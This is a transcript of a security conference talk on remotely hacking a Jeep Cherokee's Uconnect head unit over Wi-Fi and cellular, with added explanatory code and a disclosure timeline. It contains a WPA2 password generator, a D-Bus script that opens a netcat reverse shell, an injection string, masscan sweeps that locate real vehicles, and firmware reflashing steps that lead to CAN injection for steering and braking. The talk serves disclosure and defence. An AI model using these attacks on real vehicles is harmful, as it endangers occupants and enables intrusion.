Transcript of Remote Exploitation of an Unaltered Passenger Vehicle
Remote Exploitation of an Unaltered Passenger Vehicle
Dr. Charlie Miller (cmiller@openrce.org)
Chris Valasek (cvalasek@gmail.com)
Introduction
You should know us by now…
Dr. Charlie Miller, Security Engineer, Twitter (@0xcharlie)
Chris Valasek, Director of Vehicle Security Research, IOActive (@nudehaberdasher)
Disclaimer
• Enjoy the talk
• The full details will be in our 90 page white paper
• To be released Aug 10
Public service announcement
Please STOP saying UNHACKABLE,
you’re going to look silly
Overview
• Introduction
• Getting remote code running via Wi-Fi
• Expanding to cellular
• Head unit payloads
• Flashing CAN chip
• Cyberphysical payloads
Remote Attacks
Remote Attack Paradigm
1. Remote compromise
Figure labels (remote attack surfaces): TPMS, Telematics (CDMA/3G/4G/LTE), Bluetooth, Wi-Fi, In-car apps, Remote keyless entry
Remote Attack Paradigm
1. Remote compromise
2. Lateralization
Figure labels: Running exploit; CAN / LIN / MOST / Flexray
Remote Attack Paradigm
1. Remote compromise
2. Lateralization
3. CAN message analysis (in advance)
Figure labels: CAN / LIN / MOST / Flexray; ECUs on the bus: Engine, Sensors, Occupant safety, Power Steering, Self-Parking, Radio, Transmission, ABS
Remote Attack Paradigm
1. Remote compromise
2. Lateralization
3. CAN message analysis (in advance)
4. CAN message injection
• Reprogram firmware
• Functionality
Figure labels: Running exploit; CAN / LIN / MOST / Flexray; Pre-Collision System, Self-Parking, Adaptive Cruise Control
The Vehicle
2014 Jeep Cherokee
http://www.blogcdn.com/www.autoblog.com/media/2013/02/2014-jeep-cherokee-1.jpg
Uconnect 8.4AN RA4 (Harman Kardon)
Uconnect 8.4AN RA4 (Harman Kardon)
# pidin info
CPU:ARM Release:6.5.0 FreeMem:91Mb/512Mb BootTime:Jul 30 21:45:38 2014
Processes: 107, Threads: 739
Processor1: 1094697090 Cortex A8 800MHz FPU
(pidin is the QNX process-information utility; Release 6.5.0 is the QNX Neutrino version on the head unit, and the Cortex-A8 is the OMAP application processor referred to later in the deck.)
Jail Break
Jailbreaking the Uconnect
• Was NOT required for the remote exploit
• Was invaluable for gaining knowledge about the OS / services
• NOT, I repeat, NOT needed for remote exploitation
Wi-Fi
Problems with attacks over Wi-Fi
• Not on by default
• Need to connect to the WPA2 network
WPA2 password
char *get_password(){
    int c_max = 12;
    int c_min = 8;
    unsigned int t = time(NULL);      /* seed is the current time, one-second precision */
    srand(t);
    unsigned int len = (rand() % (c_max - c_min + 1)) + c_min;   /* 8..12 characters */
    char *password = malloc(len);
    int v9 = 0;
    do {
        unsigned int v10 = rand();
        int v11 = convert_byte_to_ascii_letter(v10 % 62);        /* [A-Za-z0-9] */
        password[v9] = v11;
        v9++;
    } while (len > v9);
    return password;
}
Password guessing
• Password based on when the unit was first started, with second precision
• We know the year; if you guess the month: 15 million password possibilities
• If you suppose it was during the day: 7 million password possibilities
• Should be possible to brute force in under an hour
Setting the time…
local rtcTime = getV850RealtimeClock()
local rtcValid = false
if rtcTime == nil or rtcTime.year == 65535 or rtcTime.month == 255 or rtcTime.day == 255 or
   rtcTime.hour == 255 or rtcTime.min == 255 or rtcTime.sec == 255 then
    dbg.print("Clock: start -- V850 time not received or is set to factory defaults")
...
if rtcValid == false then
    dbg.print("Clock: start -- Unable to create the UTC time from V850")
    setProperty("timeFormat24", false)
    setProperty("enableClock", true)
    setProperty("gpsTime", true)
    setProperty("manualUtcOffset", 0)
    defTime = {}
    defTime.year = 2013
    defTime.month = 1
    defTime.day = 1
    defTime.hour = 0
    defTime.min = 0
    defTime.sec = 0
    defTime.isdst = false
    setSystemUTCTime(os.time(defTime))   -- falls back to 2013-01-01 00:00:00 when the RTC is unset
    timeFormatOverride = false
    enableClockOverride = false
end
Actually it's easy!
• My WPA2 password was "TyYMxfPhZxkp"
• This corresponds to epoch time 0x50e22720
• This is Jan 01 2013 00:00:32 GMT
• Took 32 seconds for WifiSvc to get started up
• Really only a few dozen passwords to try
(0x50e22720 = 1356998432; the 2013-01-01 00:00:00 fallback is 0x50e22700, so the seed is that default plus the 32 seconds of boot time.)
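The collapse from "62 letters, 8 to 12 of them" to "one candidate per boot second" is what the slides above describe; the script below is an added example (not the authors' code) that makes it concrete. It mirrors the get_password() logic on the slide, seeded from the 2013-01-01 default, and enumerates one candidate per second of a boot window. The LCG inside LcgRand is an assumption standing in for the unit's libc rand(), which the page does not show, so it does not reproduce the real string "TyYMxfPhZxkp"; it shows the size of the list an attacker actually has to try.

```python
"""Enumerate the WPA2 candidate list implied by a time-seeded generator.

Added example, not code from the talk. Seed = boot time (seconds),
length 8..12, 62-letter alphabet, as on the slide. LcgRand is an
assumed stand-in for the head unit's libc rand(), so the exact
password "TyYMxfPhZxkp" is NOT reproduced here.
"""
import calendar

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
C_MIN, C_MAX = 8, 12
DEFAULT_EPOCH = calendar.timegm((2013, 1, 1, 0, 0, 0))   # 0x50e22700, the Lua fallback


class LcgRand:
    """Stand-in for srand()/rand(); the constants are an assumption."""

    def __init__(self, seed):
        self.state = seed & 0xFFFFFFFF

    def rand(self):
        self.state = (self.state * 1103515245 + 12345) & 0xFFFFFFFF
        return (self.state >> 16) & 0x7FFF


def get_password(seed):
    """Mirror of the slide's get_password(), parameterised by the seed."""
    rng = LcgRand(seed)
    length = rng.rand() % (C_MAX - C_MIN + 1) + C_MIN      # 8..12
    return "".join(ALPHABET[rng.rand() % 62] for _ in range(length))


def naive_keyspace():
    """Number of strings an attacker faces without knowing the seed."""
    return sum(62 ** n for n in range(C_MIN, C_MAX + 1))


def candidates(first_seed, window_seconds):
    """One password per boot second in [first_seed, first_seed + window)."""
    return [get_password(first_seed + i) for i in range(window_seconds)]


if __name__ == "__main__":
    cands = candidates(DEFAULT_EPOCH, 60)
    print(f"naive keyspace: {naive_keyspace():.3e} strings")
    print(f"time-seeded keyspace for a 60 s boot window: {len(cands)} strings")
    print("seed +32 ->", cands[32])
```

To use it against a real unit you would swap LcgRand for the target's actual rand() implementation and feed the candidates to a WPA2 cracker; the window size is the only parameter that matters, and the slide's "few dozen" is the 32-second boot delay plus some slack.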
Starting Nmap 6.01 ( http://nmap.org ) at 2015-07-26 11:23 CDT
Nmap scan report for 192.168.5.1
Host is up (0.0036s latency).
PORT      STATE SERVICE
2011/tcp  open  raid-cc
2021/tcp  open  servexec
4400/tcp  open  unknown
6010/tcp  open  x11
6020/tcp  open  unknown
6667/tcp  open  irc
51500/tcp open  unknown
65200/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
D-Bus
D-Bus: Overview
• Interprocess communications
• Can require authentication; the Jeep did NOT
• We used D-Feet to look at services
• dbus-python for scripts / exploits

telnet 192.168.5.1 6667
Trying 192.168.5.1...
Connected to 192.168.5.1.
Escape character is '^]'.
AUTH ANONYMOUS
OK 4943a53752f52f82a9ea4e6e00000001
BEGIN
D-Bus: Services & Methods
D-Bus: Command Line Injection (NavTrailService)
function methods.rmTrack(params, context)
    -- params.filename comes straight from the D-Bus caller and is pasted into a shell command
    return {
        result = os.execute("rm \"" .. trail_path_saved .. params.filename .. "\"")
    }
end
* Many others contained command line injection vulnerabilities
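The rmTrack function above is the textbook shape of a command-line injection: a caller-controlled string concatenated into a command that a shell then parses. Below is an added example (not code from the talk) that mirrors that pattern in Python next to a version that deletes the file without ever invoking a shell. TRACK_DIR is a constructed temporary directory standing in for trail_path_saved, and the sample filenames are constructed.

```python
"""The rmTrack pattern next to a version that never touches a shell.

Added example, not code from the talk. The Lua on the slide builds
`rm "<dir><filename>"` by concatenation and hands it to os.execute, so
whatever the D-Bus caller puts in params.filename is parsed by the
shell. TRACK_DIR stands in for trail_path_saved (constructed temp dir).
"""
import os
import tempfile

TRACK_DIR = tempfile.mkdtemp(prefix="trails_")


def rm_track_vulnerable_command(filename):
    """Builds the command exactly as rmTrack does. Returned rather than
    executed so the injected shell syntax can be inspected safely."""
    return 'rm "' + TRACK_DIR + "/" + filename + '"'


def rm_track_hardened(filename):
    """Delete one file inside TRACK_DIR without a shell.

    Accepts only a bare basename, and only if the resolved path still
    sits directly in TRACK_DIR (blocks '..', absolute paths and symlink
    escapes). Shell metacharacters are inert: they are just a filename.
    """
    if not filename or filename != os.path.basename(filename):
        raise ValueError("filename must be a bare name: %r" % filename)
    if filename in (".", ".."):
        raise ValueError("refusing to remove a directory entry")
    root = os.path.realpath(TRACK_DIR)
    target = os.path.realpath(os.path.join(root, filename))
    if os.path.dirname(target) != root:
        raise ValueError("path escapes the track directory")
    os.remove(target)          # raises FileNotFoundError for a missing file
    return target


def hardened_rejects(filename):
    """True if validation refuses the name; False if it reached os.remove
    (which then fails on a missing file instead of executing anything)."""
    try:
        rm_track_hardened(filename)
    except ValueError:
        return True
    except FileNotFoundError:
        return False
    return False


def make_track(name):
    """Create an empty track file for the demo and return its real path."""
    path = os.path.join(os.path.realpath(TRACK_DIR), name)
    open(path, "w").close()
    return path


if __name__ == "__main__":
    evil = '"; netcat -l -p 6666 | /bin/sh; echo "'
    print(rm_track_vulnerable_command(evil))     # shell would run netcat
    print("hardened rejects it:", hardened_rejects(evil))
    make_track("trail1.gpx")
    print("removed:", rm_track_hardened("trail1.gpx"))
```

The hardened version is not "the same command with quoting fixed": quoting a shell string is the fragile fix, and replacing the shell with a direct filesystem call plus a path-containment check is the one that also closes the traversal case.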
D-Bus: No vulnerability needed (NavTrailService)
"com.harman.service.NavTrailService":
{"name":"com.harman.service.NavTrailService",
 "methods":{"symlinkattributes":"symlinkattributes","getProperties":"getProperties","execute":"execute","unlock":"unlock","navExport":"navExport","ls":"ls","attributes":"attributes" …

#!python
import dbus
bus_obj = dbus.bus.BusConnection("tcp:host=192.168.5.1,port=6667")
proxy_object = bus_obj.get_object('com.harman.service.NavTrailService', '/com/harman/service/NavTrailService')
playerengine_iface = dbus.Interface(proxy_object, dbus_interface='com.harman.ServiceIpc')
print playerengine_iface.Invoke('execute', '{"cmd":"netcat -l -p 6666 | /bin/sh | netcat 192.168.5.109 6666"}')
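Everything in this section rests on the bus accepting the ANONYMOUS SASL mechanism over TCP, which the telnet session showed. The script below is an added example (not the authors' code) that performs that handshake itself, in the form a defender would use to audit a unit: it sends the NUL byte and AUTH ANONYMOUS, parses the server's OK <guid> reply, sends BEGIN, and reports the GUID if the bus let an unauthenticated client in. ScriptedSocket is a constructed stand-in so the block runs offline; the GUID it replays is the one from the telnet session on the slide.

```python
"""Check whether a TCP-exposed D-Bus daemon accepts ANONYMOUS auth.

Added example, not code from the talk. Speaks the D-Bus SASL handshake
seen in the telnet session (AUTH ANONYMOUS -> OK <guid> -> BEGIN).
ScriptedSocket is a constructed stand-in for socket.socket.
"""
import re
import socket

OK_RE = re.compile(rb"^OK ([0-9a-f]{32})\r\n")


class ScriptedSocket:
    """Replays canned server replies and records what the client sent."""

    def __init__(self, replies):
        self.replies = list(replies)
        self.sent = b""

    def sendall(self, data):
        self.sent += data

    def recv(self, n):
        return self.replies.pop(0) if self.replies else b""

    def close(self):
        pass


def anonymous_auth_guid(sock):
    """Return the server GUID if ANONYMOUS auth is accepted, else None.

    Per the D-Bus spec the client opens with a single NUL byte, then
    sends one SASL command per CRLF-terminated line.
    """
    sock.sendall(b"\0AUTH ANONYMOUS\r\n")
    line = b""
    while not line.endswith(b"\r\n"):          # reply may arrive in pieces
        chunk = sock.recv(512)
        if not chunk:
            return None
        line += chunk
    m = OK_RE.match(line)
    if not m:
        return None        # e.g. b"REJECTED EXTERNAL DBUS_COOKIE_SHA1\r\n"
    sock.sendall(b"BEGIN\r\n")                  # session is now live, no credentials
    return m.group(1).decode()


def check_host(host, port=6667, timeout=3.0):
    """Live variant: same check over a real TCP connection."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return anonymous_auth_guid(s)


if __name__ == "__main__":
    demo = ScriptedSocket([b"OK 4943a53752f52f82a9ea4e6e00000001\r\n"])
    print("anonymous auth accepted, server guid:", anonymous_auth_guid(demo))
```

A non-None result is the finding; what follows (Invoke on com.harman.ServiceIpc, as in the script above) needs no further vulnerability. The fix on the daemon side is to drop the ANONYMOUS mechanism and not bind the bus to a routable interface at all.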
We basically revealed the vulnerability last year!
Uconnect Payloads
GPS Tracker 3000
#!python
import dbus
bus_obj = dbus.bus.BusConnection("tcp:host=X.X.X.X,port=6667")
proxy_object = bus_obj.get_object('com.harman.service.NDR', '/com/harman/service/NDR')
playerengine_iface = dbus.Interface(proxy_object, dbus_interface='com.harman.ServiceIpc')
print playerengine_iface.Invoke('JSON_GetProperties', '{"inprop":["SEN_GPSInfo"]}')
HVAC
require "service"
params = {}
control = {}
params.zone = "front"
control.fan = arg[1]
params.controls = control
x = service.invoke("com.harman.service.HVAC", "setControlProperties", params)
Radio Volume
require "service"
params = {}
params.volume = tonumber(arg[1])
x = service.invoke("com.harman.service.AudioSettings", "setVolume", params)
Cellular Exploitation
Netstat Review
# netstat -n | grep LISTEN
tcp 0 0 *.6010 *.* LISTEN
tcp 0 0 *.2011 *.* LISTEN
tcp 0 0 *.6020 *.* LISTEN
tcp 0 0 *.2021 *.* LISTEN
tcp 0 0 127.0.0.1.3128 *.* LISTEN
tcp 0 0 *.51500 *.* LISTEN
tcp 0 0 *.65200 *.* LISTEN
tcp 0 0 *.4400 *.* LISTEN
tcp 0 0 *.6667 *.* LISTEN
Finding the Jeep’s IP
# ifconfig
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 33192
inet 127.0.0.1 netmask 0xff000000
pflog0: flags=100<PROMISC> mtu 33192
uap0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
address: 30:14:4a:ee:a6:f8
media: <unknown type> autoselect
inet 192.168.5.1 netmask 0xffffff00 broadcast 192.168.5.255
ppp0: flags=8051<UP,POINTOPOINT,RUNNING,MULTICAST> mtu 1472
inet 21.28.103.144 -> 68.28.89.85 netmask 0xff000000
Femto-Cell Comms
• Airave 2.0
• We bought 2 'stolen' ones before getting a working device (Thanks Ebay!)
• Public jailbreak (turns on port 23)
• Successful in communicating w/ the Jeep!
• Range ~ 30m
How far?
Long Distance Communications (Sprint)
Searching for Vehicles
$ bin/masscan 21.0.0.0/8 -p6667
$ bin/masscan 25.0.0.0/8 -p6667
Discovered open port 6667/tcp on 25.18.2.211
Discovered open port 6667/tcp on 25.36.166.111
Discovered open port 6667/tcp on 25.22.203.32
Discovered open port 6667/tcp on 25.17.146.238
Discovered open port 6667/tcp on 25.22.138.67
Discovered open port 6667/tcp on 25.20.97.217
Discovered open port 6667/tcp on 25.23.97.210
Discovered open port 6667/tcp on 25.33.57.216
Discovered open port 6667/tcp on 25.19.52.6
Discovered open port 6667/tcp on 25.32.29.32
Gathering Vehicle Information
./shutupdave.py
Scanning 21.18.23.0...
Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2015-06-16 19:09:28 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 256 hosts [1 port/host]
Scan complete
Found 2 hosts
21.18.23.151 : 1C4RJFCMXEXXXXXXX , 2014 JEEP GRAND+CHEROKEE+OVERLAND
21.18.23.97 : 1C6RR7PT8DXXXXXXX , 2013 RAM 1500+LONGHORN
…
Vehicles Located via Scanning
2013 DODGE VIPER
2013 RAM 1500
2013 RAM 2500
2013 RAM 3500
2013 RAM CHASSIS 5500
2014 DODGE DURANGO
2014 DODGE VIPER
2014 JEEP CHEROKEE
2014 JEEP GRAND CHEROKEE
2014 RAM 1500
2014 RAM 2500
2014 RAM 3500
2014 RAM CHASSIS 5500
2015 CHRYSLER 200
2015 JEEP CHEROKEE
2015 JEEP GRAND CHEROKEE
Vehicle Estimates
• We found 19 duplicate VINs in a scan of 2694 vehicles
• Estimated 381,980 +/- 89,393
• We now know that the real number is 1.4 million. We obviously went with a conservative estimate
Uconnect firmware (v850)
Now we send CAN messages?
Inside Uconnect (figure labels: CAN, SPI)
Inside the Uconnect
Updating the V850: Firmware
# iocupdate -c 4 -p usr/share/V850/cmcioc.bin
• V850 firmware is NOT signed
• No code signing mechanism present
• Updating only works if v850 in “bootrom” mode
V850 Internals: CAN Modules & Addressing
http://am.renesas.com/products/mpumcu/v850/V850esfx/v850esfx3/Documentation.jsp
V850 Internals: CAN Registers
http://am.renesas.com/products/mpumcu/v850/V850esfx/v850esfx3/Documentation.jsp
V850 Internals: Base Address
V850 Internals: Segments & Initial Values
V850 Internals: CAN Data Buffer XREFs
V850 Internals: Setting CAN Data Values
V850 Internals: SPI Parser
file = '/dev/ipc/ch7'
g = assert(ipc.open(file))
f = assert(io.open(file, "r+b"))
g:write(0xf0, 0x02)
bytes = f:read(0x18)
print(hex_dump(bytes))
g:close()
f:close()
V850 Internals: SPI Memory Corruption Bugs
V850 Internals: Sending Arbitrary CAN Msgs
USB-less upgrade
• To flash the V850, it needs to be in bootrom mode
• If you put it in bootrom mode, it restarts the OMAP in upgrade mode, so the attacker loses control
• Initial bootup code runs from the read-only filesystem
• It calls the "hd" application, which lives in the writable portion of the filesystem
• Replace hd with your own code that can run while the V850 is in bootrom mode
Make a mistake?
Exploit Chain
Step 1: Find IP address of a vehicle
Step 2: Get code running on OMAP chip
Step 3: Reflash the V850, reboot
Step 4: Send arbitrary CAN messages
Cyber Physical Internals
wiTECH: Overview
wiTECH: Security Unlocks
wiTECH: SecurityAccess
```java
// Call as shown on the slide: a hard-coded passphrase, MD5, the "BC" provider
// (presumably BouncyCastle) and AES, plus the classes that implement the unlock.
Uc.init("G3n3r@ti0n", "MD5", "", "BC", "AES", new String[]
    {"com.chrysler.lx.UnlockCryptographerTest",
     "com.dcx.securityunlock.encrypted.EncryptedSecurityUnlock", "",
     "com.dcx.NGST.jCanFlash.flashfile.efd2.SecurityUnlockBuilderImpTest"});
```
PAM: Checksums
Jeep Checksums
IDH: 02, IDL: 0C, Len: 04, Data: 80 00 06 7F
IDH: 02, IDL: 0C, Len: 04, Data: 80 00 08 D9
IDH: 02, IDL: 0C, Len: 04, Data: 80 00 19 09
Prius Checksums
IDH: 02, IDL: E4, Len: 05, Data: 98 00 00 00 83
IDH: 02, IDL: E4, Len: 05, Data: 9A 00 00 00 85
IDH: 02, IDL: E4, Len: 05, Data: 9E 00 00 00 89
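As an added example (not code from the slides or the authors' paper), the following Python parses frames in the "IDH/IDL/Len/Data" notation used above and checks their trailing checksum byte against the two schemes; the Jeep CRC-8 parameters (polynomial 0x1D, initial value 0xFF, inverted result) are an inference from the three sample frames, and the Prius scheme is a byte sum over ID, length and data.

```python
import re
# Added example (not the slides' or the authors' code): parse the "IDH/IDL/Len/Data"
# lines above and check the trailing checksum byte. Jeep CRC-8 parameters (poly 0x1D,
# init 0xFF, inverted output) are inferred from the samples; Prius is a byte sum.
FRAME_RE = re.compile(
    r"IDH:\s*([0-9A-Fa-f]{2}),\s*IDL:\s*([0-9A-Fa-f]{2}),\s*Len:\s*([0-9A-Fa-f]{2}),\s*Data:\s*((?:[0-9A-Fa-f]{2}\s*)+)")

def jeep_checksum(body: bytes) -> int:
    """CRC-8 over the data bytes before the checksum; the CAN ID is not covered."""
    crc = 0xFF
    for b in body:
        crc ^= b
        for _ in range(8):
            crc = ((crc << 1) ^ 0x1D) & 0xFF if crc & 0x80 else (crc << 1) & 0xFF
    return crc ^ 0xFF

def prius_checksum(can_id: int, body: bytes) -> int:
    """Sum of ID high byte, ID low byte, DLC (body + checksum) and data, mod 256."""
    return ((can_id >> 8) + (can_id & 0xFF) + len(body) + 1 + sum(body)) & 0xFF

def parse_frame(line: str) -> tuple:
    """Return (can_id, data bytes); raise if the line is malformed or Len disagrees."""
    m = FRAME_RE.search(line)
    if not m:
        raise ValueError(f"unrecognised frame line: {line!r}")
    can_id = (int(m.group(1), 16) << 8) | int(m.group(2), 16)
    data = bytes.fromhex(m.group(4))
    if len(data) != int(m.group(3), 16):
        raise ValueError("Len field does not match the number of data bytes")
    return can_id, data

def frame_is_valid(line: str, scheme: str) -> bool:
    """True when the last data byte equals what the named scheme ("jeep"/"prius") predicts."""
    can_id, data = parse_frame(line)
    body, given = data[:-1], data[-1]
    expected = jeep_checksum(body) if scheme == "jeep" else prius_checksum(can_id, body)
    return expected == given

def bad_frames(frames, scheme: str) -> list:
    """Lines whose checksum fails: corrupt captures or frames not built by the real sender."""
    return [line for line in frames if not frame_is_valid(line, scheme)]

# Constructed copies of the six frames listed on the slide.
JEEP_FRAMES = ["IDH: 02, IDL: 0C, Len: 04, Data: 80 00 06 7F",
               "IDH: 02, IDL: 0C, Len: 04, Data: 80 00 08 D9",
               "IDH: 02, IDL: 0C, Len: 04, Data: 80 00 19 09"]
PRIUS_FRAMES = ["IDH: 02, IDL: E4, Len: 05, Data: 98 00 00 00 83",
                "IDH: 02, IDL: E4, Len: 05, Data: 9A 00 00 00 85",
                "IDH: 02, IDL: E4, Len: 05, Data: 9E 00 00 00 89"]
```

Running `bad_frames` over a capture of the relevant IDs flags frames whose checksum does not match, which is the first thing to check when traffic on a safety-relevant ID looks unexpected.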
PAM: Device
PAM: Checksum Code
Capturing CAN messages
This year…METAL
Cyber Physical action!
Normal CAN messages - example
wipers
Turn signals
speedometer
Diagnostic CAN messages
Diagnostic + Normal CAN messages
[Diagram: Us, Target ECU, Normal source of traffic]
Shut down source
[Diagram: Us, Target ECU, Normal source of traffic]
Become the source!
[Diagram: Us, Target ECU, Normal source of traffic]
steering
Braking
Disclosure
Disclosure Timeline
• Oct 24, 2014 -> Vulnerabilities disclosed to FCA
• Mar 2, 2015 -> Disclosed ability to send CAN msgs remotely
• Apr 10, 2015 -> Full scope of hack disclosed
• May 12, 2015 -> FCA informed of cellular vector confirmation
• Jun 2, 2015 -> FCA informed of nation-wide cellular confirmation
• Jul 16, 2015 -> FCA given pre-release copy of our paper/research
• Jul 16, 2015 -> FCA releases Uconnect patch
• Jul 20, 2015 -> Wired article/video
• Jul 24, 2015 -> Sprint network blocks port 6667 traffic
• Jul 24, 2015 -> FCA Recalls 1.4MM vehicles vulnerable to attack
Additional testing?
Impact
Wired story
Recall
stagefright
Conclusion
Conclusions
• Remote compromise of a connected vehicle is possible
• This is NOT just an FCA issue. More connectivity requires more security
• These issues are a combination of: OEMs, Tier-1s, Telecom
• Take this information and look at other cars
• We’re just two bros with one car
• What might be considered an ‘air-gap’ may not be one in reality
• Cellular->Uconnect->Reprogram Firmware->SPI
• Architecture can introduce more hurdles
• Hackers now have an example of making real-world impact
Questions?